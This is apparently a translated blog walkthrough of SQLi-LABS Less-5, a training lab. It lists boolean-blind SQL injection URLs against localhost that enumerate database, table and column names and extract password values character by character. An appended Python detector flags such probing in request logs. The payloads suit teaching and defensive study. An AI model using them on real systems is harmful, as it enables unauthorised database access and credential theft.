• Boolean-based blind SQL injection (for Level 5 of SQLi-LABS Page-1, Basic Challenges)


    Database operations

    Database name length

    http://localhost/sqli/Less-5/?id=1'and (length(database())=10)--+

    Length of other database names

    http://localhost/sqli/Less-5/?id=1'and (length((select schema_name from information_schema.schemata limit 0,1))=6)--+

    Characters of the current database name

    http://localhost/sqli/Less-5/?id=1'and (ascii(substr(database(),1,1))>32)--+

    Characters of other database names

    http://localhost/sqli/Less-5/?id=1'and (ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>32)--+

    Table operations

    Table name length

    http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))=6)--+

    Length of the second table name

    http://localhost/sqli/Less-5/?id=1'and (length((select table_name from information_schema.tables where table_schema=database() limit 1,1))=6)--+

    First character of the first table name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>32)--+

    Second character of the first table name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))>32)--+

    First character of the second table name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))>32)--+

    Second character of the second table name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))>32)--+

    Column operations

    Column name length

    http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1))=2)--+

    Length of the second column name

    http://localhost/sqli/Less-5/?id=1'and(length((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1))=2)--+

    First character of the first column name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),1,1))>32)--+

    Second character of the first column name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 0,1),2,1))>32)--+

    First character of the second column name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),1,1))>32)--+

    Second character of the second column name

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select column_name from information_schema.columns where table_name='users' and table_schema=database() limit 1,1),2,1))>32)--+

    Data operations

    Length of the first data value

    http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 0,1))=32)--+

    Length of the second data value

    http://localhost/sqli/Less-5/?id=1'and(length((select password from security.users limit 1,1))=32)--+

    First character of the first data value

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),1,1))>32)--+

    Second character of the first data value

    http://localhost/sqli/Less-5/?id=1'and(ascii(substr((select password from security.users limit 0,1),2,1))>32)--+

    From the requests above you can derive a general formula and adapt it as needed.

    If anything here is wrong, suggestions and corrections are welcome in the comments.
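
The requests above repeat one query shape while only the row offset, character position and compared value change, which makes this kind of probing easy to spot in request logs. The Python detector below is an added example, not part of the original post; the log entries, client addresses, function names and the `min_hits` threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus, urlsplit

# Function shapes taken from the probes listed on this page.
PROBE = re.compile(
    r"ascii\(substr\(|length\((?:database\(\)|\(select)|information_schema\."
)

# Constructed sample (client, request target) pairs; not real traffic.
SAMPLE = [
    ("192.0.2.10", "/sqli/Less-5/?id=1"),
    ("192.0.2.10", "/sqli/Less-5/?id=2"),
    ("192.0.2.44", "/sqli/Less-5/?id=1'and (length(database())=10)--+"),
    ("192.0.2.44", "/sqli/Less-5/?id=1%27and%20(ascii(substr(database(),1,1))%3E32)--+"),
    ("192.0.2.44", "/sqli/Less-5/?id=1%27and%20(ascii(substr(database(),1,1))%3E64)--+"),
    ("192.0.2.44", "/sqli/Less-5/?id=1%27and%20(ascii(substr(database(),2,1))%3E64)--+"),
    ("192.0.2.77", "/sqli/Less-5/?id=1'and (length(database())=8)--+"),
]


def template(target):
    """URL-decode the query string, drop whitespace and mask every number,
    so requests that differ only in offsets or thresholds compare equal."""
    query = unquote_plus(urlsplit(target).query).lower()
    return re.sub(r"\d+", "N", re.sub(r"\s+", "", query))


def find_blind_probing(entries, min_hits=3):
    """Return {client: {"hits": n, "templates": k}} for clients that sent at
    least min_hits requests matching the probe shapes. A high hit count with
    few distinct templates is the signature of boolean-blind enumeration."""
    seen = defaultdict(list)
    for client, target in entries:
        shape = template(target)
        if PROBE.search(shape):
            seen[client].append(shape)
    return {
        client: {"hits": len(shapes), "templates": len(set(shapes))}
        for client, shapes in seen.items()
        if len(shapes) >= min_hits
    }


if __name__ == "__main__":
    for client, stats in find_blind_probing(SAMPLE).items():
        print(client, stats)
```

Matching on the decoded, whitespace-free template rather than the raw URL means percent-encoding and spacing differences between requests do not hide the repetition.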
  • Original article: https://www.cnblogs.com/Tzsblog/p/14189984.html